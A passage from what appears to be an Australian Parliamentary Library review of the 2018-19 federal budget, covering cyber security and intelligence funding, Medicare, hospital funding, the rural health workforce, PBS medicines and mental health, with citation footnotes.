⢠the 24/7 cyber incident monitoring and response capability announced in the Mid-Year Economic and Fiscal Outlook 2017-18451 and
⢠the Cyber Security Unit, including its personnel, that formed inside the Digital Transformation Agency as a consequence of the Review of the Events Surrounding the 2016 eCensus.452.453. 446. Bishop, op. cit. 447.. 448. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, p. 165. See also D Watt, ‘Defence overview’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 449.. 450. Explanatory Memorandum, Intelligence Services Amendment (Establishment of the Australian Signals Directorate) Bill 2018. 451. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 175. 452.. 453. Australian National Audit Office, Review of cyber security: report by the Independent Auditor, Commonwealth of Australia, December 2017.
Cyber as a frontier for Parliament
The impact of cyberspace on parliamentary business is also contemplated in the Budget, and parliamentary interest in cyber affairs is apparent in the terms of reference for current committee inquiries.454 Ongoing parliamentary business includes:
⢠the Joint Committee on Law Enforcement’s inquiry into the impact of new and emerging
information and communications technology
⢠the Senate Standing Committee on Finance and Public Administration’s inquiry into digital delivery of government services and
⢠the Joint Standing Committee on Trade and Investment Growth’s inquiry into the trade system and the digital economy.
On 8 May 2018, the House of Representatives Standing Committee on Industry, Innovation, Science and Resources tabled the report, Internet Competition Inquiry, which considered the impact on local businesses in Australia of global internet-based competition.
454. The Department of Parliamentary Services was allocated $9 million over four years to establish a Cyber Security Operations Centre for Parliament House: Budget measures: budget paper no. 2: 2018-19, p. 162.
National security overview Cat Barker).455
2017 Independent Intelligence Review (the Review)
The most recent independent review of the Australian Intelligence Community (AIC) was completed in June 2017, with a public version of the report released in July 2017.456 The reviewers made 23 recommendations relating to structural arrangements, capability and resourcing, legislation, and oversight.457)).458
The Government has not released a formal response to the Review, but stated when it released the report that it accepted the recommendations ‘as a sound basis to reform Australia’s intelligence arrangements’, and has been progressively implementing them.459
The Mid-Year Economic and Fiscal Outlook 2017-18 included $154.5 million over five years to:460
⢠establish the Office of National Intelligence (ONI) in the Prime Minister and Cabinet portfolio ($118.5 million). One of the Review’s most significant recommendations was the replacement of the ONA with the ONI, led by a Director-General who would be the head of the NIC and the Prime Minister’s principal adviser on intelligence community issues. The ONI would have a leadership and coordination role across the NIC, including advising the Government on
455. C Barker, ‘National security overview’, Budget review 2017-18, Research paper series, 2016-17, Parliamentary Library, Canberra, 2017. 456. Department of the Prime Minister and Cabinet (PM&C), 2017 Independent Intelligence Review, Commonwealth of Australia, Canberra, June 2017. The reviewers were Michael L’Estrange and Stephen Merchant, with Sir Iain Lobban acting as an
adviser.
457. For a summary of recommendations, see: Ibid., pp. 13-22. 458. Ibid., pp. 46-48. 459. 460. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 175.
intelligence collection and assessment priorities and the appointment of senior NIC office-holders, and the evaluation of NIC agencies461
⢠fund a ‘24/7 cyber incident monitoring and response capability’ in the Australian Cyber Security Centre ($33.6 million) and462
⢠fund additional secondments from ASIO to the Australian Government Security Vetting Agency (AGSVA) ($2.4 million). The Review noted that the time taken for AGSVA to complete Top Secret (Positive Vetting) security clearances was ‘exacerbating the intelligence community’s existing workforce challenges’. It recommended funding for additional ASIO secondments to AGSVA as soon as possible, and a review of the situation in early 2018, with alternative options to be explored if the existing remediation efforts had not resulted in processing times being reduced to six months or less.463).464
The Budget includes additional funding for implementation of the Review’s recommendations. The total amount is marked as not-for-publication on national security grounds, and will be spread across ‘various agencies’.465 However, included in the total is:
⢠$52.1 million for the IGIS’s increased oversight functions (already included in the forward estimates). The Review recommended that the IGIS’s jurisdiction be expanded to include AUSTRAC and the intelligence functions of the AFP, ACIC and what is now the DoHA, and that the IGIS be given additional resources to enable it to sustain a full-time staff of around 50.466 The PAES indicate that the funding includes increasing staffing from 17 to 55 FTE, as well as ‘commercial rent, IT systems and secure fit-out costs of new premises’467
⢠$18.1 million for AGD and OPC to undertake a comprehensive review of the legal framework governing NIC agencies and related oversight bodies (already included in the forward estimates). The Review recommended that this be undertaken by ‘an eminent and suitably qualified individual or number of individuals, supported by a small team of security and intelligence law experts with operational knowledge of the workings of the intelligence community’. It also recommended some specific amendments that could be progressed while the comprehensive review took place and468
⢠an unspecified amount to establish a Joint Capability Fund (JCF) for the NIC. The Review recommended that a JCF be established to finance NIC cross-agency projects, including an NIC Innovation Fund, NIC Innovation Hub and an NIC Science and Technology Advisory Board. It recommended the total amount in the JCF be equivalent to the Efficiency Dividend levied on AIC agencies and the intelligence functions of other NIC agencies.469 The Review estimated that if its recommendations about the application of the Efficiency Dividend to NIC agencies were
461.
462. See: Ibid., p. 65 (part of Recommendation 3). 463. Ibid., pp. 77-78 (Recommendation 12). 464. Australian Government, Portfolio additional estimates statements 2017-18: Prime Minister and Cabinet portfolio, pp. 33, 35; Australian Government, Portfolio additional estimates statements 2017-18: Attorney-General’s portfolio, pp. 9, 13-15, 98.
465. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 163. 466. PM&C, 2017 Independent Intelligence Review, op. cit., pp. 115-118 (Recommendations 21 and 22). 467. Australian Government, Portfolio additional estimates statements 2017-18: Prime Minister and Cabinet portfolio, p. 33. 468. PM&C, 2017 Independent Intelligence Review, op. cit., pp. 89-110 (Recommendations 15-20). 469. Ibid., pp. 82-85 (Recommendation 7).
adopted, the JCF would accumulate around $370.0 million over the five years from 2017-18.470
Other national security funding The Budget also includes $24.4 million of additional funding for ASIO, and undisclosed amounts for ASIS (over two years from 2018-19) and ACIC (over five years from 2017-18) ‘to meet the Government’s national security objectives’.471 Additional national security funding was also provided in the Mid-Year Economic and Fiscal Outlook 2017-18.472
470. 471. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 103, 131. 472. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, pp. 153-154.
Medicare and hospital funding Amanda Biggs
Medicare The Government has announced a number of measures relating to Medicare in this Budget. Expenditure on Medicare is estimated to be $24.1 billion in 2018-19, an increase in real terms of 1.1 per cent on 2017-18.473 Funding for Medicare is now through a special account, the Medicare Guarantee Fund, which was established as a result of last year’s Budget.474
New Medicare Benefits Schedule listings A number of new and amended listings will be added to the Medicare Benefits Schedule (MBS) as a result of recommendations made by the independent Medical Services Advisory Council (MSAC). Among the new items to be funded are:
⢠a new pathology test for patients with a cystic fibrosis gene mutation
⢠treatment for patients with idiopathic (of unknown cause) overactive bladder
⢠magnetic resonance imaging (MRI) prostate scans for diagnosing prostate cancer and for monitoring diagnosed patients.475
The total cost over four years from 2018-19 is estimated to be $25.4 million.476 The Government is also continuing the work of the MBS Review Taskforce, which is reviewing existing MBS items to ensure they reflect contemporary clinical practice and to remove obsolete services from the schedule.477 Net savings of $189.7 million from the Review have been ‘re-invested by the Government in Medicare’.478 Recently, the Chair of the Taskforce announced that the Government had accepted 38 of its most recent recommendations, which included a number of additions and amendments to the MBS.479 New items to be funded include:
⢠renal medicine items to support dialysis services in rural and remote regions, which will improve access for Aboriginal and Torres Strait Islander people with kidney disease. Aboriginal and Torres Strait Islander people experience kidney disease at 7.3 times the rate of other Australians480
⢠three dimensional (3D) breast tomosynthesis—a form of high resolution imaging for breast cancer detection.
Amendments include restricting GP referrals for some MRI scans for knees, and restructuring the schedule for spinal surgery services.481
473. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, p. 6-19. 474. The Medicare Guarantee Act 2017 received Royal Assent on 26 June 2017. 475. Department of Health (DoH), ‘Guaranteeing Medicare - Medicare Benefits Schedule - new and amended listings’, Budget 2018-19 Fact Sheet, 8 May 2018.
476. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 109. 477. DoH, ‘Healthier Medicare - removing obsolete services from the Medicare Benefits Schedule’, Budget 2016-17 Fact Sheet, 3 May 2016. 478. Budget measures: budget paper no. 2: 2018-19, p. 110. 479. B Robinson (Chair of the MBS Review Taskforce), ‘Latest recommendations accepted by Government’, media release, 29 April
2018.
480. DoH, ‘Indigenous Health - investment in remote renal services and infrastructure’, Budget 2018-19 Fact Sheet, 8 May 2018. 481. DoH, ‘Guaranteeing Medicare -Medicare Benefits Schedule Review - response to Taskforce recommendations’, Budget 2018-19 Fact Sheet, 8 May 2018.
New listings and amendments to the MBS do not require legislation, but are enacted through legislative instrument.
Modernising the health and aged care payments system Last year’s Budget included funding of $67.3 million (over one year) to modernise the health and aged care payments ICT systems. This budget includes an additional $106.8 million over four years to progress this work.482
Low income thresholds The Government will increase the Medicare levy low-income thresholds for singles, families, and seniors and pensioners in line with movements in the Consumer Price Index, from the 2017-18 income year.483 The cost to the Budget over the forward estimates is $230.0 million. These threshold adjustments will require legislation.
Medicare levy As expected, the Budget confirmed that the Government will not proceed with the planned 0.5 percentage point increase to the Medicare levy which was to be used to help fund the National Disability Insurance Scheme (NDIS).484 The levy will remain at 2.0 per cent. The implications of this decision are briefly discussed in the Library Flagpost article, ‘‘Fighting for funding’: where to next for the NDIS?’.485
Compliance $9.5 million over five years from 2017-18 is provided to improve compliance and debt recovery arrangements for doctors. The measure includes ‘better targeting investigations into fraud, inappropriate practice and incorrect claiming’.486 Legislation will be introduced to support these measures.487
Stakeholder reaction Stakeholder reaction to individual Medicare measures has varied. For example, the Australian Healthcare and Hospitals Association (AHHA) welcomed the continuing work of the MBS Review Taskforce488 and the Consumers Health Forum welcomed the ‘additional funding for hospitals, Medicare, aged care and medicines’.489 However, some in the diagnostic imaging sector have criticised the government for failing to immediately end the freeze on indexation of diagnostic imaging fees, and for restricting GP-referred MRI scans on knees.490 A number of disability and social sector stakeholders have expressed disappointment over the decision to not proceed with the Medicare levy increase.491
482. Budget measures: budget paper no. 2: 2018-19, pp. 110-111. 483. Ibid., p. 32. 484. Ibid. 485. L Buckmaster, ’Fighting for funding’: where to next for the NDIS?’, FlagPost, Parliamentary Library blog, 27 April 2018. 486. Budget measures: budget paper no. 2: 2018-19, p.109. 487. DoH, ‘Guaranteeing Medicare - improving safety and quality through stronger compliance’, Budget 2018-19 Fact Sheet,
8 May 2018. 488. Australian Healthcare and Hospitals Association (AHHA) ‘Health data boost right step on the road to reform’, media release, 8 May 2018. 489. Consumers Health Forum (CHF), ‘Health budget includes welcome consumer focus’, media release, 8 May 2018. 490. Australian Diagnostic Imaging Association, ‘Budget: Government is “miles short” on Medicare’, media release, 8 May 2018. 491. L Buckmaster, op. cit.
Hospital funding All but two states (Victoria and Queensland) have signed up to a new five-year public hospital funding agreement from 2020-21.492 Under the agreement, the Government has committed to providing $130.2 billion over five years from 2020-21, based on funding 45 per cent of the efficient growth in hospital activity, with total funding growth capped at 6.5 per cent a year.493 These parameters are the same as those operating under the current agreement. Estimated allocations to individual states and territories to 2021-22 are provided in the Budget.494 The new agreement also provides for the establishment of a Health Innovation Fund.495 The Fund is conditional on all states and territories signing the hospital funding agreement.496
In addition to funding for public hospital activities, the Budget includes $188.9 million to support the expansion of the Joondalup Health Campus and Osborne Park Hospital, and refurbishment of Royal Perth Hospital.497 The funding is being provided in the form of a GST top-up payment to Western Australia for 2017-18.498
Stakeholder reaction The Consumers Health Forum has welcomed the additional funding for hospitals.499 The Australian Medical Association has argued that ‘more [hospital] funding will be needed over the long term’.500 The Victorian Government, which has not signed the new agreement, has been critical of the level of Commonwealth hospital funding.501
492. G Hunt (Minister for Health), ‘Northern Territory and Tasmania sign onto record hospital funding agreement’, media release, 23 April 2018. 493. Budget measures: budget paper no. 2: 2018-19, p. 126. 494. Australian Government, Federal financial relations: budget paper no. 3: 2018-19, p. 15. 495. Budget measures: budget paper no. 2: 2018-19, p. 126. 496. DoH, ‘Record Hospital Investment - National Health Agreement 2020-21 to 2024-25’, Budget 2018-19 Fact Sheet, 8 May
2018.
497. Federal financial relations: budget paper no. 3: 2018-19, p. 23. 498. Budget measures: budget paper no. 2: 2018-19, p. 144. 499. CHF, op. cit. 500. Australian Medical Association (AMA), ‘Safe and steady health budget, but bigger reforms are still to come’, media release,
9 May 2018. 501. J Hennessy (Victorian Minister for Health), ‘Patients suffer as Turnbull gives big business a tax cut’, media release, 8 May 2018.
Rural health workforce Amanda Biggs
A Stronger Rural Health Strategy It is widely recognised that people in rural and remote areas of Australia experience poorer health outcomes, lower life expectancy and poorer access to health services than those living in metropolitan areas.502 To address shortages of health workers in rural and remote areas, the Government has announced A Stronger Rural Health Strategy package and allocated funding of $83.3 million over five years from 2017-18.503 The Government says the Strategy will deliver around an additional 3,000 specialist general practitioners (GPs) and over 3,000 nurses, as well as hundreds of allied health professionals in rural areas over ten years, for a total investment of $550 million.504 However, it is not clear from the budget papers what specific measures count towards this total investment figure.
Rural medical workforce A range of measures for the medical workforce are included in the package.
A Murray-Darling Medical Schools Network supporting end-to-end training for students to study medicine in the regions will be established. The network will involve seven university medical schools (subject to finalisation of contractual arrangements and the universities meeting accreditation requirements).505 A pool of Commonwealth Supported Places (CSPs) taken from
existing medical school allocations will be established. Commencing in 2021, the pool will comprise up to 60 medical CSPs to be allocated by participating universities every three years and redistributed between providers through a competitive process. This will provide flexibility to allow rural health workforce priorities to be more quickly addressed as they emerge. These priorities will be identified through a new health workforce data tool called HeaDS UPP.506
Thirty CSPs will be allocated in the first round to a new medical school in Orange. Universities with reduced medical CSPs will be allowed a commensurate increase to their international medical enrolments, as a transitional arrangement. $95.4 million has been earmarked to establish the network. However, no new CSPs will be funded.507 Legislation is not required; however, the establishment of the network and pool arrangements may need to be specified in the triennial Commonwealth Grants Scheme funding agreements between the participating universities and the Commonwealth.508
To enhance training opportunities in rural areas, two new Junior Doctor Training programs will be introduced. The Rural Primary Care Stream will provide educational support for junior doctors to train in rural general practice. The Private Hospital Stream will provide salary support for junior doctors to work in private hospitals. Concurrent to this will be the development by the National Rural Health Commissioner of a National Rural Generalist pathway.509 Legislation is not required.
502. Australian Institute of Health and Welfare (AIHW), ‘Rural & remote Australians: overview’, AIHW website. 503. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 106-107. 504. Department of Health (DoH), ‘Stronger Rural Health Strategy-delivering high quality care’, Budget 2018-19 Fact Sheet, 8 May 2018.
505. The universities involved include the University of NSW (Wagga Wagga), University of Sydney (Dubbo), Charles Sturt University/Western Sydney University (Orange), Monash University (Bendigo, Mildura), University of Melbourne/La Trobe University (Shepparton, Bendigo, Wodonga). 506. DoH, ‘Stronger Rural Health - Teaching - Train in the regions, stay in the regions’, Budget 2018-19 Fact Sheet, 8 May 2018. 507. Ibid. 508. Department of Education, ‘Commonwealth Grants Scheme’, website. The agreements are made under the Higher Education
Support Act 2003. 509. DoH, ‘Stronger Rural Health -Training-improving access to training in rural areas and the private sector through junior doctor training’, Budget 2018-19 Fact Sheet, 8 May 2018.
New fee arrangements that support medical graduates to pursue additional qualifications as vocationally registered (VR) general practitioners (GPs) will be introduced.510 Australian trained non-VR doctors who work in Modified Monash Model (MMM)511 remoteness classification areas 2-7 will be able to claim 80 per cent of the Medicare rebate that is claimable by VR GPs, representing an increase on the Medicare rebate they can currently claim. Support will be offered to existing non-VR GPs to upgrade their qualifications. When a new non-VR GP begins the pathway to full registration (Fellowship) they will be able to claim the full Medicare rebate.512 It is hoped that supporting non-VR GPs to attain higher qualifications in rural areas will help address the maldistribution of the medical workforce in these areas. Legislation will not be required, as changes to Medicare fees are made through legislative instrument.513
At the same time under a separate Home Affairs budget measure, the number of visas for overseas trained doctors (OTDs), who provide a significant proportion of Medicare-funded services in rural areas, will be capped at 2,100 per year from January 2019.514 Although not detailed in the budget papers, media reports suggest this will result in a decrease of 200 OTDs per year.515 As the pool of new OTD doctors declines, Medicare expenses in the form of rebates that are paid to them should also fall, resulting in estimated savings of $415.5 million over four years.516 Savings will be used to fund health policy priorities.517 Imposing a cap on OTDs does not require legislation.
The geographic eligibility criteria for rural bulk billing incentives will be updated. Incentives are available to doctors in designated rural and remote areas for bulk billing patients under 16 or those holding a Commonwealth concession card. The geographic eligibility criteria that are currently applied are based on out-dated population figures; these will be updated and be based on the MMM remoteness classification areas 2-7.518 Legislation will not be required as the changes can be achieved through legislative instrument.
Other medical workforce measures include:
⢠changing the return of service obligations for medical students under bonded medical training programs by introducing an optional three year bonded period (down from six years)519 and
⢠streamlining GP training arrangements provided through the Royal Australian College of General Practitioners and the Australian College of Rural and Remote Medicine for GPs to gain
510. VR GPs complete a three year training program that allows them to pursue a career as a specialist general practitioner. Royal Australian College of GPs, ‘Becoming a GP in Australia,’ webpage. 511. The Modified Monash Model (MMM) is a new geographical classification system, using up-to-date population data, which the Government is using to address the maldistribution of medical services across Australia. DoH, ‘Modified Monash Model’,
webpage. A searchable map of MMM locations is available via this DoctorConnect website. 512. DoH, ‘Stronger Rural Health - Training - improved access to Australian trained general practitioners and quality care’, Budget 2018-19 Fact Sheet, 8 May 2018. Currently, rebates for non-VR GPs are considerably lower than for VR GPs. 513. Health Insurance (General Medical Services Table) Regulations 2017. 514. Budget measures: budget paper no. 2: 2018-19, p. 134. 515. ‘Australia to let in fewer overseas doctors, in one of biggest budget savings’, The Guardian (Australia), 8 May 2018; S Parnell,
‘Junior medics’ reason to go bush’, The Australian, 9 May 2018. 516. OTDs who work in a District of Workforce Shortage are exempt from the Section 19AB restrictions of the Health Insurance Act 1973, which prohibits OTDs from accessing a Medicare provider number. See Department of Human Services (DHS),
‘Medicare provider number for overseas trained doctors and foreign graduates’, DHS website. The difference between the Medicare rebate for exempt OTDs and the 80% of the fee that non-VR GPs will be able to claim appears to constitute most of the savings. 517. Budget measures: budget paper no. 2: 2018-19, p. 134. This measure constitutes the largest saving in this year’s budget. See Australian Government, Budget Overview, p. 36. 518. DoH, ‘Stronger Rural Health—Recruitment and retention—supporting rural and remote areas through improved targeting of rural bulk billing incentives’, Budget 2018-19 Fact Sheet, 8 May 2018. 519. DoH, ‘Stronger Rural Health —Recruitment and retention—addressing doctor shortages across rural and remote areas by strengthening bonded program ’, Budget 2018-19 Fact Sheet, 8 May 2018.
vocational recognition and providing 100 additional vocational training places through the Australian General Practice Training Program from 1 January 2021.520
Nursing and allied health workforce The package includes a number of measures to support the nursing and allied health workforces, in recognition that rural areas also experience shortages of these health professionals.
A new Workforce Incentive Program will be established from 1 July 2019, which will provide targeted incentives for general practices to employ allied health professionals and targeted incentives for doctors to practise in non-metropolitan areas. Existing GP, nursing and allied health incentive programs will be replaced with the new Workforce Incentive Program. Eligible practices that employ allied health professionals can receive incentive payments of up to $125,000 per year, with a rural loading for those in MMM classification areas 3-7. Doctors located in MMM classification areas 3-7 may receive a maximum payment of up to $60,000. Around 5,000 practices and more than 7,000 doctors are expected to be eligible for the payments.521
The role of nursing in team-based and multidisciplinary primary care service settings will be enhanced through continued funding to the Australian Primary Health Care Nurses Association, which helps nurses to deliver care in primary care settings. An independent review of the nursing curricula and pathways into nursing will be conducted.522
Support for Aboriginal and Torres Strait Islander health professional organisations will continue through increasing investment in Aboriginal and Torres Strait Islander Health Professional Organisations of around $1.6 million a year. In addition, a new primary care funding model will be implemented from 1 July 2019, in consultation with the Indigenous health sector.523
Stakeholder reaction Most stakeholders have been generally supportive of the package. The Rural Doctors Association of Australia (RDAA) and the National Rural Health Alliance (NRHA) both welcomed the Strategy. The RDAA described it as ‘a multi-pronged approach to supporting improved medical workforce distribution to rural and remote Australia’.524 The NRHA welcomed funding ‘to help fill the health workforce gaps’ and described the new Workforce Incentive Program as the ‘first step in increasing very low numbers of allied health workers in rural and remote areas’.525 The Australian Medical Association (AMA) also welcomed the Strategy.526
For several years, there have been calls, including from some in the National Party, to establish a Murray Darling Basin Medical School.527 These calls have faced opposition from some medical groups, including the AMA, who argue that there is an oversupply of medical graduates528 and the Australian Medical Students Association (AMSA), who argued that increasing the number of
520. DoH, ‘Stronger Rural Health—Training—streamlining general practice training to produce Australian trained general practitioners where they are needed’, Budget 2018-19 Fact Sheet, 8 May 2018. See also, Budget measures: budget paper no. 2: 2018-19, p. 107.
521. DoH, ‘Stronger Rural Health—Recruitment and retention—Workforce Incentive Program’, Budget 2018-19 Fact Sheet, 8 May 2018. 522. DoH, ‘Stronger Rural Health—Recruitment and retentions—strengthening the role of the nursing workforce’, Budget 2018-19 Fact Sheet, 8 May 2018. 523. M McCormack (Deputy Prime Minister) and J McVeigh (Minister for Regional Development, Territories and Local
Government), Regional Australia—A stronger economy delivering stronger regions, ministerial budget statement, 2018, p. 92. 524. Rural Doctors Association of Australia (RDAA), ‘Budget delivers for rural health’, media release, 8 May 2018. 525. National Rural Health Alliance, ‘Rural health budget $$ welcome but not enough’, media release, 8 May 2018. 526. Australian Medical Association (AMA), ‘AMA welcomes 'Stronger Rural Health Strategy'’, media release, 9 May 2018. 527. J Dewar, ‘Regional unis face ‘triple whammy’’, The Australian, 24 May 2017; ‘Regional taxation key to growth’, Central
Western Daily, 30 June 2016. 528. S Parnell, ‘More doctors not the answer’, The Australian, 4 May 2018.
medical graduates would mean a higher number missing out on limited internship placements.529 In announcing the Murray-Darling medical schools network, the Government appears to have addressed some of these concerns by agreeing to not increase the total number of medical CSPs available overall. The AMA described the decision to ‘reject the proposal for a stand-alone Murray Darling Medical School in favour of [a] network’ as ‘a better approach’.530 The AMSA Rural Health group also expressed ‘cautious optimism’ over the announcement.531
In relation to the visa changes for OTDs, Dr Michael Gannon, President of the AMA, has reportedly questioned whether the savings will be achievable, as other medical providers will still be available to provide the services no longer provided by OTDs.532
529. Ibid. 530. AMA, ‘AMA welcomes 'stronger rural health strategy'’, op. cit. 531. AMSA Rural Health, ‘Budget: rural health in focus’, media release, 10 May 2018. 532. N Evans, ‘Visa saving questioned by doctors’, West Australian, 10 May 2018.
Medicines Alex Grove
The Budget provides funding for new medicines and vaccines, while continuing to control overall expenditure on the Pharmaceutical Benefits Scheme (PBS). Reforms to the way the Government pays for high cost medicines do not directly affect consumers, but do have implications for the pharmaceutical supply chain, including pharmaceutical companies, wholesalers and pharmacists.
Pharmaceutical Benefits Scheme The Australian Government subsidises the cost of many medicines through the PBS.533 The Budget contains changes to the way the Government pays for certain high cost medicines on the PBS. Under the current system, the Government may enter into special price arrangements for the listing of a PBS medicine through a deed of agreement. This allows the published PBS price (which can affect international markets) to be higher than the actual price of the medicine to the Government. The pharmaceutical company funds the difference between the published price and the ‘cost-effective price’ through a confidential rebate which is paid to the Government in arrears.534 Rebates have been growing in recent years. In 2016-17 the Department of Health (DoH) received $3.27 billion in ‘PBS drug recoveries’, much of which related to rebates paid for new medicines to treat Hepatitis C.535
The Government has negotiated with individual pharmaceutical companies to reduce the published PBS price of some high cost medicines from 1 July 2018, with a corresponding decrease in the rebate to be repaid by the companies. The Government will also implement an ‘improved payment administration trial’ for some high cost medicines from 1 July 2019.536 The design of the trial is still being negotiated, but the intent is to pay pharmaceutical companies the cost-effective price of the medicine, while continuing to remunerate wholesalers and pharmacists based on the published price.537 These changes to the remuneration of the PBS supply chain may make it easier for pharmacists to stock high cost medicines.538 They may require legislation.
As part of the same budget measure, the Government has set aside $1.0 billion over the forward estimates to pay for medicines which have not yet been listed on the PBS.539 Including both the changes to rebates and the $1.0 billion that has been set aside, the overall measure is budget neutral because government upfront expenditure on the PBS will reduce, but revenue from rebates will also fall. When the $1.0 billion is included, overall PBS investment (expenditure minus rebates) is forecast to grow slightly in nominal terms to 2021-22, but to decline in real terms by 7.3 per cent.540
New medicines are listed each month on the PBS, following a positive recommendation from the Pharmaceutical Benefits Advisory Committee and pricing negotiations with DoH.541 The Budget provides $1.4 billion (less confidential rebates) over five years from 2017-18 for new and
533. Department of Health (DoH), ‘About the PBS’, Pharmaceutical Benefits Scheme (PBS) website, last updated 1 January 2018. 534. ‘Government pushing on with rebate change but implementation the challenge’, PharmaDispatch.com, 27 February 2018. 535. DoH, Annual report 2016-17, pp. 291, 302. 536. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian
Government, Budget measures: budget paper no. 2: 2018-19, pp. 112-120. 537. DoH, ’PBS news: Changes to PBS payment arrangements for certain medicines’, PBS website, last updated 3 May 2018. 538. G Hunt (Minister for Health), Speech to the APP Conference, Gold Coast, speech, 3 May 2018. 539. Provision for future increases in new medicine listings is made in the Contingency Reserve, but in this Budget such expenses
have been allocated to the pharmaceutical benefits and services sub-function. See Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 6-20, 6-21, 6-44. 540. Ibid., pp. 6-21, 6-22. 541. A Grove, The Pharmaceutical Benefits Scheme: a quick guide, Research paper series, 2015-16, Parliamentary Library, Canberra, 2016.
amended listings on the PBS. This includes medicines to treat cancers, multiple sclerosis and spinal muscular atrophy (SMA, a form of motor neuron disease), as well as a medicine to prevent HIV/AIDS.
The Budget contains measures to encourage appropriate use of medicines and increased prescribing of generic and biosimilar medicines. This includes $28.2 million over five years from 2017-18 to upgrade doctors’ prescribing software, including an option for electronic rather than paper PBS prescriptions.542 There is also $5.0 million over three years from 2017-18 to continue a campaign to encourage prescribing of generic and biosimilar medicines (which are often cheaper than their brand name equivalents). This will include changes to doctors’ prescribing software to allow medicine ingredient name prescribing by default, without preventing doctors from prescribing by brand name.543 Increased uptake of these medicines is expected to reduce PBS spending by $335.8 million over five years from 2017-18. The Government will also target prescribers with education activities to encourage appropriate use of certain medicines, and blood and blood products for an expected saving of $77.6 million over five years from 2017-18.
Life Saving Drugs Program The Life Saving Drugs Program (LSDP) funds expensive medicines for rare and life threatening diseases. It is not part of the PBS. The Government responded to the Post-market Review of the Life Saving Drugs Program in January 2018.544 The Government announced it would retain and improve the LSDP (despite the review recommending that it should transition to the PBS), and apply pricing policies such as statutory price reductions (which currently apply to PBS medicines) to LSDP medicines.545
The Budget includes $5.4 million over five years (already provided for in forward estimates) from 2017-18 to implement improvements to the administration of the LSDP. The Government has reached an agreement with Medicines Australia (MA) on behalf of pharmaceutical companies to implement PBS-like pricing policies for the LDSP. This is likely to result in savings, but the financial impact is not published in the Budget as it is commercial-in-confidence.
Immunisation
The National Immunisation Program (NIP) is a series of free immunisations given at specified ages or to people in specified risk groups.546 The Budget provides $42.5 million over five years from 2017-18 to list whooping cough vaccines for pregnant women, high dose influenza vaccines for people aged 65 or over and a vaccine for children aged 12 months to protect against meningococcal A, C, W and Y.
Stakeholder reaction
Reaction to the budget measures has been largely positive, apart from concerns about the overall level of funding for the PBS.
MA has welcomed funding for the listing of new PBS medicines, and will continue to negotiate regarding the payment trial for high cost medicines.547 The Generic and Biosimilar Medicines
542. DoH, Improving access to medicines - ePrescribing for safer medicines, Budget 2018-19 fact sheet, DoH, 8 May 2018. 543. DoH, Improving access to medicines - encouraging greater use of generic and biosimilar medicines, Budget 2018-19 fact sheet, DoH, 8 May 2018. 544. DoH, Post-market review of the Life Saving Drugs Programme: June 2014-June 2015, report to the Australian Government,
2018; Australian Government, Australian Government response to the post-market review of the Life Saving Drugs Program, 2018. 545. Ibid. 546. DoH, ‘National Immunisation Program schedule’, DoH website, last updated 8 December 2017. 547. Medicines Australia, Government commits to PBS, time to unpack the detail, media release, 8 May 2018.
Association (GBMA) has welcomed prescribing and other measures to encourage uptake of generic and biosimilar medicines, as well as funding for new PBS listings and the LSDP.548 Pharmaceutical industry media publication PharmaDispatch has taken a more negative view, questioning why PBS funding is declining in real terms over the forward estimates when funding for other health programs is growing.549
The Pharmacy Guild of Australia, representing pharmacy owners, has welcomed changes to rebates to the extent that they reduce cash flow pressures on pharmacies. In negotiating the terms of the trial, the Guild states it will insist on automated arrangements for pharmacies and no reduction in dispensing related remuneration.550
The Consumers Health Forum of Australia has welcomed budget measures promoting infant and maternal health, including the listing of a medicine to treat SMA in infants and whooping cough immunisations for pregnant women.551
548. Generic and Biosimilar Medicines Association, Commitment to affordable healthcare, media release, 9 May 2018. 549. ‘Why is the PBS being starved of funding?’, PharmaDispatch.com, 10 May 2018. 550. Pharmacy Guild of Australia, ‘The PBS - now more than ever the most sustainable part of the health system’, Forefront, 8(9), 8 May 2018.
551. Consumers Health Forum of Australia, Health budget includes welcome consumer focus, media release, 8 May 2018.
Mental health
Lauren Cook
Mental health reform is a key component of the Australian Government’s ‘long term health plan’.552
In previous years, the Australian Government has been criticised for mental health being ‘chronically underfunded’,553 with some stakeholders claiming that the mental health budget is ‘really half of what it should get’.554 Stakeholders have also criticised previous funding allocations, suggesting that the Government should ‘reorient investment towards early intervention and prevention’.555
The Government has committed an additional $338.1 million in the Budget for mental health, with a particular focus on suicide prevention, supporting older Australians, and mental health research.556 This investment is nearly double the commitments to mental health made in the 2017-18 Budget.557
It is unlikely that the measures outlined below will require legislation.
Suicide prevention
The Government has committed $72.6 million in the Budget for suicide prevention initiatives. This includes $37.6 million over four years to beyondblue and Primary Health Networks to improve follow-up care for people discharged from hospital following a suicide attempt,558 $33.8 million over four years to Lifeline Australia to enhance its telephone crisis services, and $1.2 million in 2018-19 to SANE Australia to deliver a targeted suicide awareness campaign.
Prior to the Budget, stakeholders advised the Government to invest in intensive follow up treatment after suicide attempts. In its pre-budget submission, Mental Health Australia stated that a previous suicide attempt was the most reliable predictor of a subsequent death by suicide, with half of the people discharged from hospital after a suicide attempt not attending follow-up treatment.559
This funding has been welcomed by stakeholders, with the Chair of beyondblue, Julia Gillard, commending the Minister for Health for his ‘commitment to reducing Australia’s suicide rate’.560
Older Australians
As part of the Government’s ‘More Choices for a Longer Life’ package, the Government has committed a total of $102.5 million over four years from 2018-19 to improve access to psychological services for older Australians. This includes $82.5 million in funding for mental health services for people in residential aged care facilities, and $20.0 million for the development
